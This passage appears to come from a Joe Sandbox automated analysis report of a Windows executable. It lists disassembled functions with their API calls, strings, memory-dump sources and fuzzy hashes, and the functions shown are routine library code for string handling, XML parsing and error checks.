                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@String$??0?$V01@@$DeallocateH_prolog3_V01@
                • String ID:
                • API String ID: 1056643236-0
                • Opcode ID: c910574222003db9bac16509213f65630ed3fc19479b130418d3ae3755d533ec
                • Instruction ID: 744e345eb1ed6ca4baede5929f1b6a90a10c04ba2dee298da0a4afcb7b041403
                • Opcode Fuzzy Hash: c910574222003db9bac16509213f65630ed3fc19479b130418d3ae3755d533ec
                • Instruction Fuzzy Hash: DAE01279A00144AFCB05FBA4D451AFD7775AF94315F448044FC017B352CB746A49AF75
                Function 00C54320 Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C54327
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000024), ref: 00C54339
                • ??Y?$CStringT@_W@Cmm@@QAEAAV01@PB_W@Z.RWSNDPQSKZ(?,?,00000024), ref: 00C54345
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(00000000,?,00000024), ref: 00C5434D
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@String$??0?$V01@@$DeallocateH_prolog3_V01@
                • String ID:
                • API String ID: 1056643236-0
                • Opcode ID: 9b78d0439ab3bb5db1f67dba7291ac070f7378327fc5e39111818c3410525607
                • Instruction ID: 18d69e3447b0f89b4f11d0cdb551031e09382b245ec558d8c6e8003c3c7fdd02
                • Opcode Fuzzy Hash: 9b78d0439ab3bb5db1f67dba7291ac070f7378327fc5e39111818c3410525607
                • Instruction Fuzzy Hash: 63E06D79A00104ABCB04FBA494416ED7771AF98315F409004FC4127741DB705A89AB25
                Function 00CFADAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 00CFAE3D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: df207be588225e460e7b148ae47f1009137bf5136a7d24d85675161529783ff6
                • Instruction ID: 42b648517641a703c2246b379423a5daa0f0e0fa6e98c19535527a8d2b2d8167
                • Opcode Fuzzy Hash: df207be588225e460e7b148ae47f1009137bf5136a7d24d85675161529783ff6
                • Instruction Fuzzy Hash: 1A5181E1D0820596CB617B14C90137AB7E4EB50710F288D68F5DD823E9EB34CDB59AB7
                Function 00CBA84D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                Download Yara Rule
                APIs
                Strings
                • unordered_map/set too long, xrefs: 00CBA9F0
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3__floor_pentium4
                • String ID: unordered_map/set too long
                • API String ID: 2218291521-306623848
                • Opcode ID: d151df0efe168d3ed228cf808051ec49f02d10546b4e50056f4f6774661ca042
                • Instruction ID: 4b2b66cb9efe5257aaac1fca487a046ad1f7bf797dd792a1747349a2ef977627
                • Opcode Fuzzy Hash: d151df0efe168d3ed228cf808051ec49f02d10546b4e50056f4f6774661ca042
                • Instruction Fuzzy Hash: C451AC719007099FCB15DFA9C080AEDF7F4FF58314F20861AE496B7252EB71A982DB61
                Function 00CBC68F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBC696
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,?,00000018,unordered_map/set too long,?,?,00000000,?,?,00000000,00CB5234,?,?), ref: 00CBC6FC
                  • Part of subcall function 00CE2896: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00CE28A2
                Strings
                • unordered_map/set too long, xrefs: 00CBC7A4
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@H_prolog3StringV01@@std::invalid_argument::invalid_argument
                • String ID: unordered_map/set too long
                • API String ID: 693385739-306623848
                • Opcode ID: 2ee6069c99842bf371e77fe9d8f233c7864fb62d10c76265ca64fe170c20c753
                • Instruction ID: bb80842561aae74cdb2d0827af715f609ca0a30961d52ba503c316ef6f8d58c4
                • Opcode Fuzzy Hash: 2ee6069c99842bf371e77fe9d8f233c7864fb62d10c76265ca64fe170c20c753
                • Instruction Fuzzy Hash: F931B4719006489FCB15DFB8C885BEEB7F4AF59301F108519F486B7252EB74AA84DB60
                Function 00C6039D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C603A4
                  • Part of subcall function 00C60601: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?), ref: 00C60619
                  • Part of subcall function 00C6048E: __EH_prolog3_GS.LIBCMT ref: 00C60495
                  • Part of subcall function 00C6048E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00D334D8,?,00000000,?,?,00000024,00C603DE,00000001,00600040,?,0000002C,00C5F3C5,?,?,?,?), ref: 00C604E3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$H_prolog3H_prolog3_
                • String ID: endUTC$startUTC
                • API String ID: 2187001830-740499625
                • Opcode ID: 11d4a13bc35e110439792efde910a3f39e712f3addda9941edf3cc2aab3b3e2c
                • Instruction ID: 912c5bd106ca469bc34dce0bfdc6595cc2b71fbbbc86f2a209928dce9c53bf0d
                • Opcode Fuzzy Hash: 11d4a13bc35e110439792efde910a3f39e712f3addda9941edf3cc2aab3b3e2c
                • Instruction Fuzzy Hash: B8215E70940219AFDB15EBE4CCD2BFFBB78BF14308F244129B60176191DB74AA88DB64
                Function 00C64290 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                Download Yara Rule
                APIs
                Strings
                • invalid stoull argument, xrefs: 00C642F0
                • stoull argument out of range, xrefs: 00C642FA
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3_catch
                • String ID: invalid stoull argument$stoull argument out of range
                • API String ID: 3886170330-980025665
                • Opcode ID: 74343e9cc0f1d4114d350f44dd5d1a70e28a97c623ed4452b288cb8b84358db8
                • Instruction ID: a1d361b86fa667a52c92e35cbd30b9e328bb0bc201326630043ff0eb68f13f30
                • Opcode Fuzzy Hash: 74343e9cc0f1d4114d350f44dd5d1a70e28a97c623ed4452b288cb8b84358db8
                • Instruction Fuzzy Hash: 4FF0F632D40344DBCB38EFA4C4827AC73A0BF05311F658065F855AB241CB74AF04EBA2
                Function 00C64210 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                Download Yara Rule
                APIs
                Strings
                • invalid stoull argument, xrefs: 00C64270
                • stoull argument out of range, xrefs: 00C6427A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3_catch
                • String ID: invalid stoull argument$stoull argument out of range
                • API String ID: 3886170330-980025665
                • Opcode ID: da11502fd37ff0183a0e6b6c72ff341109d9b17864357da0083e6362fbc041b6
                • Instruction ID: 40c4ed531480ab78699d960b32bb715fc69cce726c9e5fff015a36dd51c18b92
                • Opcode Fuzzy Hash: da11502fd37ff0183a0e6b6c72ff341109d9b17864357da0083e6362fbc041b6
                • Instruction Fuzzy Hash: 82F0F632E10304DFDB28FFA4C4427AC73B1AF41311F658064F9696B281DB749E44E7A2
                Function 00CBE427 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBE431
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000218,00CBE52B,00000050,00CADE1F,00000004), ref: 00CBE45C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: FileH_prolog3_ModuleName
                • String ID: debug.log
                • API String ID: 1315720902-600467936
                • Opcode ID: 72a120082ff0090b78d88e8f3dbc0f2efd0570524903287315c0c7259debdd7b
                • Instruction ID: 23bed062f72e34579e2a91e248bdd2d7871b3f17662f8e74c7a144975060b1cf
                • Opcode Fuzzy Hash: 72a120082ff0090b78d88e8f3dbc0f2efd0570524903287315c0c7259debdd7b
                • Instruction Fuzzy Hash: 441182B4A407149BC7209F65CC48ADDBAF5AF98700F40068DE045A7290CB745A899FA4
                Function 00D00215 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000FA0,-00000020,00D01998,00D01998,-00000020,00000FA0,00000000,00000010,00C62E91), ref: 00D00245
                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00D01998,-00000020,00000FA0,00000000,00000010,00C62E91), ref: 00D00255
                Strings
                • InitializeCriticalSectionEx, xrefs: 00D00225
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@CountCriticalInitializeSectionSpinState@Unlock@
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2895262047-3084827643
                • Opcode ID: 109274e82b9f4800ed7613b6d51a6d825506c4a96deba05106bc3d7e4b1ba0ea
                • Instruction ID: ff082021ff36ce5fd8bd9185a6661f159b28c212d055bad16242cc5e5d7b802e
                • Opcode Fuzzy Hash: 109274e82b9f4800ed7613b6d51a6d825506c4a96deba05106bc3d7e4b1ba0ea
                • Instruction Fuzzy Hash: C6E09231240228BBCB222F51DC09EDE7F26EF50B60F008020F918651A1CB729925A7A4
                Function 00CB0C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                Download Yara Rule
                APIs
                • ?ParseText@StrPair@tinyxml2@@QAEPADPADPBDHPAH@Z.RWSNDPQSKZ(?,-->,00000002,?), ref: 00CB0C57
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,0000000A,?,00000000), ref: 00CB0C6B
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Pair@tinyxml2@@$Document@tinyxml2@@Error@Error@2@ParseReset@Str@Text@
                • String ID: -->
                • API String ID: 3198950141-782191589
                • Opcode ID: ba6a64d288945bc2545e23e60b6ea3c6aadd8b41af895e73a743dbf11f75ab39
                • Instruction ID: dfa2e1bb858cdd319cb1979668994ca23a305d7f3e954ad4e3b881b833fe0898
                • Opcode Fuzzy Hash: ba6a64d288945bc2545e23e60b6ea3c6aadd8b41af895e73a743dbf11f75ab39
                • Instruction Fuzzy Hash: 15E026363007057FCB212E45DC02ED77F29EBA0760F004429F91966162DA62DC25A3A0
                Function 00CB87B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3
                • String ID: im_receive_handler$undefined_msg_handler
                • API String ID: 431132790-1997704712
                • Opcode ID: d69c993cf3e2bad922f1046aef553d33f8d34a3e51f4d0d05f6d35b833366c22
                • Instruction ID: 592df0eceb09ace05e0e405090c5cd8348e7572c6172bf9479bcfe846d1becce
                • Opcode Fuzzy Hash: d69c993cf3e2bad922f1046aef553d33f8d34a3e51f4d0d05f6d35b833366c22
                • Instruction Fuzzy Hash: 17E039B06003419FCB60DF798801399BBF1BB04708F10492DE494EB381CBF15688EB65
                Function 00CB8760 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3
                • String ID: send_message$undefined_msg
                • API String ID: 431132790-4080192209
                • Opcode ID: a92185e0ff92b4b2ef13b912b6acd6116c19df35809120f6e38c28d37dceb88c
                • Instruction ID: 075849256da94e04f11049ecab319b728861f28a39081244a9aec3ae41b93a79
                • Opcode Fuzzy Hash: a92185e0ff92b4b2ef13b912b6acd6116c19df35809120f6e38c28d37dceb88c
                • Instruction Fuzzy Hash: E9E039B06003519FCB60DF788801399BAF0BB04708F10496DA498EB281CBB59688EB51
                Function 00C64610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                Download Yara Rule
                APIs
                • ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(true), ref: 00C64628
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Assign@?$Cmm@@String
                • String ID: false$true
                • API String ID: 667192774-2658103896
                • Opcode ID: 0a56adad2f686c611a0d457e1fd8559c1ae5756cb2ac45723dda339855744e85
                • Instruction ID: dc7ce5922e63a311859095faea997034c87d98a2d14c7f5397e90914bc42e833
                • Opcode Fuzzy Hash: 0a56adad2f686c611a0d457e1fd8559c1ae5756cb2ac45723dda339855744e85
                • Instruction Fuzzy Hash: 89C08C35200A0C63DF045994A465729339C8B80308FC0842CFA0C8B381C930ED8097E8
                Function 00C64630 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                Download Yara Rule
                APIs
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(true), ref: 00C64648
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Assign@?$Cmm@@String
                • String ID: false$true
                • API String ID: 667192774-2658103896
                • Opcode ID: 2c7169d6312e626c3f6fbd80b1c6ba7f097db2ed502f450f1c0cecebc7af5ec9
                • Instruction ID: 0b0cc3b0415d216a03fdab24c1b61ece123082bda9d2489f6f20ce18fd7ef87c
                • Opcode Fuzzy Hash: 2c7169d6312e626c3f6fbd80b1c6ba7f097db2ed502f450f1c0cecebc7af5ec9
